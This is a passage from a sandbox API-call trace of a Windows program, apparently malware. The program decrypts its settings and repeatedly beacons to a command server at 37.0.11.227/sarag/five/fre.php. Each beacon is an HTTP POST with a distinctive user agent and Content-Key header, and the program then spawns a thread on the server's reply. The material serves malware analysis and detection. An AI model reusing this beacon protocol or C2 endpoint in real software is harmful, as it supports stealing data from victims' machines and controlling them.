pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0265.567] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0265.570] CryptDestroyKey (hKey=0x69cfa8) returned 1 [0265.570] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0265.570] CryptReleaseContext (hProv=0x6aef68, dwFlags=0x0) returned 1 [0265.571] GetProcessHeap () returned 0x690000 [0265.571] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0265.571] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0265.571] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0265.572] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0265.572] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0265.573] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0265.573] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0265.574] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0265.579] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0265.579] GetProcessHeap () returned 0x690000 [0265.579] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0265.579] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0265.579] GetProcessHeap () returned 0x690000 [0265.580] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0265.580] GetProcessHeap () returned 0x690000 [0265.580] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0265.580] GetProcessHeap () returned 0x690000 [0265.581] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0265.581] GetProcessHeap () returned 0x690000 [0265.581] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0265.582] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0265.582] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0265.586] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0265.586] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0265.593] GetProcessHeap () returned 0x690000 [0265.593] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a30 [0265.593] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0265.594] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a8a30, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69cfa8) returned 1 [0265.594] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0265.595] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0265.595] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0265.595] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0265.595] GetProcessHeap () returned 0x690000 [0265.596] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a30 | out: hHeap=0x690000) returned 1 [0265.597] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0265.597] CryptDecrypt (in: hKey=0x69cfa8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0265.597] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0265.598] CryptDestroyKey (hKey=0x69cfa8) returned 1 [0265.598] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0265.599] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0265.599] GetProcessHeap () returned 0x690000 [0265.599] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0265.599] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0265.600] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0265.614] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0265.614] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0265.615] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0265.615] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0265.616] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0265.616] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0265.616] GetProcessHeap () returned 0x690000 [0265.616] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f20 [0265.617] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a3088*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0265.617] GetProcessHeap () returned 0x690000 [0265.617] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab410 [0265.617] socket (af=2, type=1, protocol=6) returned 0x7c8 [0265.617] connect (s=0x7c8, name=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0265.745] FreeAddrInfoW (pAddrInfo=0x6a3088*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0265.745] GetProcessHeap () returned 0x690000 [0265.746] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aecc0 [0265.746] GetProcessHeap () returned 0x690000 [0265.746] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b97c0 [0265.747] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0265.748] wvsprintfA (in: param_1=0x6b97c0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0265.748] GetProcessHeap () returned 0x690000 [0265.748] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6af440 [0265.748] GetProcessHeap () returned 0x690000 [0265.748] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0265.748] GetProcessHeap () returned 0x690000 [0265.748] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a3fe0 [0265.748] GetProcessHeap () returned 0x690000 [0265.748] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b97c0 [0265.749] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0265.750] wvsprintfA (in: param_1=0x6b97c0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0265.750] GetProcessHeap () returned 0x690000 [0265.750] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0265.750] GetProcessHeap () returned 0x690000 [0265.751] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0265.751] send (s=0x7c8, buf=0x6ad508*, len=242, flags=0) returned 242 [0265.754] send (s=0x7c8, buf=0x6aba40*, len=159, flags=0) returned 159 [0265.754] GetProcessHeap () returned 0x690000 [0265.755] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0265.755] recv (in: s=0x7c8, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0265.937] GetProcessHeap () returned 0x690000 [0265.937] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0265.937] GetProcessHeap () returned 0x690000 [0265.938] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3fe0 | out: hHeap=0x690000) returned 1 [0265.938] GetProcessHeap () returned 0x690000 [0265.938] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af440 | out: hHeap=0x690000) returned 1 [0265.938] GetProcessHeap () returned 0x690000 [0265.938] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aecc0 | out: hHeap=0x690000) returned 1 [0265.939] closesocket (s=0x7c8) returned 0 [0265.940] GetProcessHeap () returned 0x690000 [0265.940] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab410 | out: hHeap=0x690000) returned 1 [0265.940] GetProcessHeap () returned 0x690000 [0265.940] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0265.940] GetProcessHeap () returned 0x690000 [0265.940] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0265.941] GetProcessHeap () returned 0x690000 [0265.941] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f20 | out: hHeap=0x690000) returned 1 [0265.941] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x157c) returned 0x7c8 [0265.943] Sleep (dwMilliseconds=0xea60) [0265.945] GetProcessHeap () returned 0x690000 [0265.945] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0265.946] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0265.946] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0265.952] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0265.953] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aef68) returned 1 [0265.959] GetProcessHeap () returned 0x690000 [0265.959] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a88b0 [0265.960] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0265.960] CryptImportKey (in: hProv=0x6aef68, pbData=0x6a88b0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0265.961] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0265.962] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0265.962] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0265.962] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0265.962] GetProcessHeap () returned 0x690000 [0265.963] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a88b0 | out: hHeap=0x690000) returned 1 [0265.963] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0265.964] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0265.964] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0265.965] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0265.967] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0266.176] CryptReleaseContext (hProv=0x6aef68, dwFlags=0x0) returned 1 [0266.176] GetProcessHeap () returned 0x690000 [0266.176] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0266.177] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0266.181] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0266.182] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0266.183] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0266.287] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0266.287] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0266.292] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0266.293] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0266.293] GetProcessHeap () returned 0x690000 [0266.293] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0266.293] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0266.294] GetProcessHeap () returned 0x690000 [0266.294] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0266.294] GetProcessHeap () returned 0x690000 [0266.295] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0266.295] GetProcessHeap () returned 0x690000 [0266.295] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0266.295] GetProcessHeap () returned 0x690000 [0266.295] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4418 [0266.296] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0266.297] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0266.312] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0266.313] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aedd0) returned 1 [0266.320] GetProcessHeap () returned 0x690000 [0266.320] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8940 [0266.322] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0266.323] CryptImportKey (in: hProv=0x6aedd0, pbData=0x6a8940, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0266.323] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0266.323] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0266.324] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0266.324] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0266.324] GetProcessHeap () returned 0x690000 [0266.325] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8940 | out: hHeap=0x690000) returned 1 [0266.325] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0266.326] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4418, pdwDataLen=0x19fcfc | out: pbData=0x6a4418, pdwDataLen=0x19fcfc) returned 1 [0266.326] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0266.327] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0266.327] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0266.327] CryptReleaseContext (hProv=0x6aedd0, dwFlags=0x0) returned 1 [0266.328] GetProcessHeap () returned 0x690000 [0266.328] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0266.328] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0266.328] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0266.329] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0266.329] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0266.330] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0266.330] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0266.331] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0266.331] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0266.331] GetProcessHeap () returned 0x690000 [0266.331] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0266.331] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0266.331] GetProcessHeap () returned 0x690000 [0266.331] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab420 [0266.331] socket (af=2, type=1, protocol=6) returned 0x7cc [0266.332] connect (s=0x7cc, name=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0266.358] FreeAddrInfoW (pAddrInfo=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0266.358] GetProcessHeap () returned 0x690000 [0266.358] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aef68 [0266.358] GetProcessHeap () returned 0x690000 [0266.358] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b97c0 [0266.358] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0266.359] wvsprintfA (in: param_1=0x6b97c0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0266.359] GetProcessHeap () returned 0x690000 [0266.359] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6af740 [0266.359] GetProcessHeap () returned 0x690000 [0266.360] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0266.360] GetProcessHeap () returned 0x690000 [0266.360] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4460 [0266.360] GetProcessHeap () returned 0x690000 [0266.360] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b97c0 [0266.361] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0266.361] wvsprintfA (in: param_1=0x6b97c0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0266.361] GetProcessHeap () returned 0x690000 [0266.361] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0266.361] GetProcessHeap () returned 0x690000 [0266.362] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0266.362] send (s=0x7cc, buf=0x6ad508*, len=242, flags=0) returned 242 [0266.362] send (s=0x7cc, buf=0x6aba40*, len=159, flags=0) returned 159 [0266.363] GetProcessHeap () returned 0x690000 [0266.363] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0266.363] recv (in: s=0x7cc, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0266.438] GetProcessHeap () returned 0x690000 [0266.439] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0266.439] GetProcessHeap () returned 0x690000 [0266.440] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4460 | out: hHeap=0x690000) returned 1 [0266.440] GetProcessHeap () returned 0x690000 [0266.440] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af740 | out: hHeap=0x690000) returned 1 [0266.440] GetProcessHeap () returned 0x690000 [0266.440] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aef68 | out: hHeap=0x690000) returned 1 [0266.440] closesocket (s=0x7cc) returned 0 [0266.441] GetProcessHeap () returned 0x690000 [0266.441] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab420 | out: hHeap=0x690000) returned 1 [0266.442] GetProcessHeap () returned 0x690000 [0266.442] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0266.442] GetProcessHeap () returned 0x690000 [0266.442] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4418 | out: hHeap=0x690000) returned 1 [0266.443] GetProcessHeap () returned 0x690000 [0266.443] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0266.444] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1580) returned 0x7cc [0266.450] Sleep (dwMilliseconds=0xea60) [0266.452] GetProcessHeap () returned 0x690000 [0266.452] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0266.453] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0266.454] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0266.465] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0266.468] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0266.476] GetProcessHeap () returned 0x690000 [0266.476] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8970 [0266.477] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0266.477] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a8970, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69cfa8) returned 1 [0266.478] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0266.478] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0266.479] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0266.479] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0266.479] GetProcessHeap () returned 0x690000 [0266.480] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8970 | out: hHeap=0x690000) returned 1 [0266.480] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0266.481] CryptDecrypt (in: hKey=0x69cfa8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0266.490] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0266.490] CryptDestroyKey (hKey=0x69cfa8) returned 1 [0266.491] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0266.491] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0266.491] GetProcessHeap () returned 0x690000 [0266.491] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0266.492] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0266.492] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0266.493] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0266.493] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0266.494] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0266.494] StrStrA 